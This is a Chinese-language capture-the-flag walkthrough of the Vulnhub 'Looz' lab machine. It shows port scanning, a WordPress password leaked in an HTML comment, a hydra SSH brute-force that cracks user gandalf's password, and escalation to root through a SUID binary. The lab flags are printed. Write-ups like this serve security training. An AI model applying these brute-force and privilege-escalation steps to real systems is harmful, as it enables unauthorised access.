首页 > 其他分享 >Vulnhub之Looz靶机详细测试过程

Vulnhub之Looz靶机详细测试过程

时间:2023-02-04 16:55:30浏览次数:54  
标签:alatar kali 192.168 56.119 Looz Vulnhub 靶机 root 2021

Looz

识别目标主机IP地址

(kali㉿kali)-[~/Vulnhub/Looz]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:76:42:e1      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.119  08:00:27:76:a1:7d      1      60  PCS Systemtechnik GmbH     

利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.119

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.119 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-03 22:57 EST
Nmap scan report for 192.168.56.119
Host is up (0.00039s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE  SERVICE      VERSION
22/tcp   open   ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4802386769719099d50b194c98da50c (RSA)
|   256 3d525e29fb2f29e801e45d1ba11ef34b (ECDSA)
|_  256 f0f477dc3d53c3c5358287a5ba57b449 (ED25519)
80/tcp   open   http         nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Home
|_http-generator: Nicepage 3.15.3, nicepage.com
139/tcp  closed netbios-ssn
445/tcp  closed microsoft-ds
3306/tcp open   mysql        MySQL 5.5.5-10.5.10-MariaDB-1:10.5.10+maria~focal
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.5.10-MariaDB-1:10.5.10+maria~focal
|   Thread ID: 5
|   Capabilities flags: 63486
|   Some Capabilities: FoundRows, Support41Auth, ConnectWithDatabase, InteractiveClient, Speaks41ProtocolOld, SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, ODBCClient, SupportsCompression, LongColumnFlag, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: Lu(eFnu$PEJ"ilc.WN`y
|_  Auth Plugin Name: mysql_native_password
8081/tcp open   http         Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://192.168.56.119/
MAC Address: 08:00:27:76:A1:7D (Oracle VirtualBox virtual NIC)
Service Info: Host: 172.17.0.3; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.96 seconds
                                                              

获得Shell

端口3306

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ mysql -uroot -p -h 192.168.56.119
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ mysql -uroot -p -h 192.168.56.119
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: NO)

看一下mysql有无弱口令。

端口80

利用浏览器访问80端口,返回页面源代码中有以下注释:

<!--- john don't forget to remove this comment, for now wp password is  y0uC@n'tbr3akIT--->
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ nikto -h http://192.168.56.119     
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.119
+ Target Hostname:    192.168.56.119
+ Target Port:        80
+ Start Time:         2023-02-03 23:36:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7915 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2023-02-03 23:37:00 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (nginx/1.18.0) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 


端口8081

访问8081端口会自动被重定向到80端口

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ gobuster dir -u http://192.168.56.119:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.119:8081
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/03 23:41:12 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.119:8081/: Get "http://192.168.56.119:8081/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
                                                                                 

用gobuster工具扫描目录出错。

用nikto工具试一下:

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ nikto -h http://192.168.56.119:8081
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.119
+ Target Hostname:    192.168.56.119
+ Target Port:        8081
+ Start Time:         2023-02-03 23:42:29 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.20
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://wp.looz.com/index.php?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7918 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-02-03 23:43:24 (GMT-5) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 


从Nikto运行结果得知目标主机运行wordpress,利用浏览器访问该文件:

http://192.168.56.119:8081/wp-login.php

从页面源代码得知目标主机记录需要增加到/etc/hosts文件中:

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.119  wp.looz.com

刷新/wp-login.php文件得到经典的wordpress后台登录界面,从前面的注释已经知道用户名和密码,尝试一下是否可以登录后台:

发现可以成功登录(第一次登录失败,提示需要enable cookies,没做任何修改的情况下,第二次登录可以成功)

尝试替换404.php模板时,点击update file,出错:

Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

尝试用其他方法上传shell,都失败,其实在wordpress后台注意到gandalf也是管理员,看一下是否可以用hydra破解ssh密码

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ hydra -l gandalf -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.119
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-04 00:08:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.119:22/
[STATUS] 136.00 tries/min, 136 tries in 00:01h, 14344264 to do in 1757:53h, 15 active
[STATUS] 105.33 tries/min, 316 tries in 00:03h, 14344084 to do in 2269:39h, 15 active
[STATUS] 98.71 tries/min, 691 tries in 00:07h, 14343709 to do in 2421:46h, 15 active
[STATUS] 98.22 tries/min, 1475 tries in 00:15h, 14342925 to do in 2433:43h, 15 active
[STATUS] 97.24 tries/min, 3016 tries in 00:31h, 14341384 to do in 2458:08h, 15 active
[STATUS] 96.46 tries/min, 4535 tries in 00:47h, 14339865 to do in 2477:49h, 15 active
[STATUS] 96.66 tries/min, 6091 tries in 01:03h, 14338309 to do in 2472:23h, 15 active
[22][ssh] host: 192.168.56.119   login: gandalf   password: highschoolmusical
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-04 01:17:21

用了1个多小时才破解出密码。

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-74-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 04 Feb 2023 08:32:46 AM UTC

  System load:  0.0               Processes:                133
  Usage of /:   80.0% of 6.82GB   Users logged in:          0
  Memory usage: 41%               IPv4 address for docker0: 172.17.0.1
  Swap usage:   0%                IPv4 address for enp0s3:  192.168.56.119


63 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


gandalf@looz:~$ id
uid=1001(gandalf) gid=1001(gandalf) groups=1001(gandalf)
gandalf@looz:~$ 

gandalf@looz:/home$ cd alatar
gandalf@looz:/home/alatar$ ls -alh
total 44K
drwxr-xr-x 5 alatar alatar 4.0K Jun  7  2021 .
drwxr-xr-x 4 root   root   4.0K Jun  7  2021 ..
-rw------- 1 alatar alatar   45 Jun  7  2021 .bash_history
-rw-r--r-- 1 alatar alatar  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 alatar alatar 3.7K Feb 25  2020 .bashrc
drwx------ 2 alatar alatar 4.0K Jun  7  2021 .cache
drwxrwxr-x 2 alatar alatar 4.0K Jun  7  2021 Private
-rw-r--r-- 1 alatar alatar  807 Feb 25  2020 .profile
-rw-r--r-- 1 alatar alatar    0 Jun  6  2021 .sudo_as_admin_successful
-rw-rw-r-- 1 alatar alatar   33 Jun  7  2021 user.txt
-rw------- 1 alatar alatar  734 Jun  7  2021 .viminfo
drwxrwxr-x 4 alatar alatar 4.0K Jun  7  2021 wordpress
gandalf@looz:/home/alatar$ cat user.txt
9acf80de68fbb344573762e84cced6f3
gandalf@looz:/home/alatar$ 

得到user flag.

提权

gandalf@looz:/home/alatar/Private$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/at
/usr/bin/sudo
/usr/bin/fusermount
/home/alatar/Private/shell_testv1.0


gandalf@looz:/home/alatar$ cd Private/
gandalf@looz:/home/alatar/Private$ ls -alh
total 28K
drwxrwxr-x 2 alatar alatar 4.0K Jun  7  2021 .
drwxr-xr-x 5 alatar alatar 4.0K Jun  7  2021 ..
-rwsr-xr-x 1 root   root    17K Jun  7  2021 shell_testv1.0
gandalf@looz:/home/alatar/Private$ ./shell_testv1.0 
root@looz:/home/alatar/Private# cd /root
root@looz:/root# ls -alh
total 52K
drwx------  5 root root 4.0K Jun  7  2021 .
drwxr-xr-x 21 root root 4.0K Jun  7  2021 ..
-rw-------  1 root root  498 Jun  7  2021 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4.0K Jun  7  2021 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   33 Jun  7  2021 root.txt
-rw-r--r--  1 root root   50 Jun  7  2021 rundocker.sh
-rw-r--r--  1 root root   66 Jun  7  2021 .selected_editor
drwxr-xr-x  3 root root 4.0K Jun  6  2021 snap
drwx------  2 root root 4.0K Jun  6  2021 .ssh
-rw-------  1 root root 8.0K Jun  7  2021 .viminfo
root@looz:/root# cat root.txt
ab17850978e36aaf6a2b8808f1ded971
root@looz:/root# 

成功提权,拿到了root flag.

经验教训

  1. 在登录wordpress后台后要仔细查看相关信息,尤其是用户信息,会发现有2个管理员用户。

  2. 然后是破解,虽然本靶机需要非常时间的破解。

标签:alatar,kali,192.168,56.119,Looz,Vulnhub,靶机,root,2021
From: https://www.cnblogs.com/jason-huawen/p/17091883.html

相关文章

  • Vulnhub之Nasef靶机详细测试过程(未能Root)
    Nasef靶机信息名称:Nasef1:LocatingTarget地址:识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Nase]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentl......
  • Vulnhub之Nyx靶机详细测试过程
    Nyx作者:jason_huawen靶机信息名称:Nyx:1地址:https://www.vulnhub.com/entry/nyx-1,535/识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Nyx]└─$sudonetdiscov......
  • Vulnhub之Stapler靶机详细测试过程
    Stapler识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Stapler]└─$sudonetdiscover-ieth0-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|Screen......
  • vulnhub靶场之DIGITALWORLD.LOCAL: VENGEANCE
    准备:攻击机:虚拟机kali、本机win10。靶机:digitalworld.local:VENGEANCE,下载地址:https://download.vulnhub.com/digitalworld/VENGEANCE.7z,下载后直接vm打开即可。知识点......
  • Vulnhub之Bob靶机详细测试过程
    Bob作者:jason_huawen靶机信息名称:Bob:1.0.1地址:https://www.vulnhub.com/entry/bob-101,226/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Bob]└─$sudonetd......
  • vulnhub_matrix-breakout-2-morpheus
    前言靶机地址:matrix-breakout-2-morpheus攻击机:kali2022.3靶机:matrix-breakout-2-morpheus题目描述:这是《黑客帝国突围》系列的第二部,副标题为墨菲斯:1。它的主题是对......
  • vulnhub之sahu
    一、信息获取1、IP获取──(kali㉿kali)-[~]└─$sudonmap-sn192.168.62.129/24StartingNmap7.93(https://nmap.org)at2023-01-2922:47HKTNmapscanre......
  • vulnhub靶场-->MATRIX-BREAKOUT: 2 MORPHEUS
    靶机下载地址MATRIX-BREAKOUT:2MORPHEUS <点我下载开始打靶IP发现nmap扫描网段发现靶机ip:192.168.111.139端口发现对靶机进行常规端口扫描发现两个http端口......
  • vulnhub靶场 --> JANGOW: 1.0.1
    靶机下载地址JANGOW:1.0.1 <点我下载开始打靶IP发现nmap扫描网段发现靶机ip:192.168.111.140端口发现对靶机进行常规端口扫描访问网站访问80端口发现是个目录......
  • Vulnhub之Cheran EE靶机详细测试过程(需要特别注意靶机的网络模式)
    CheranEE靶机信息名称:Cheran:1地址:https://www.vulnhub.com/entry/cheran-1,521/识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Cheran]└─$sudonetdiscover-i......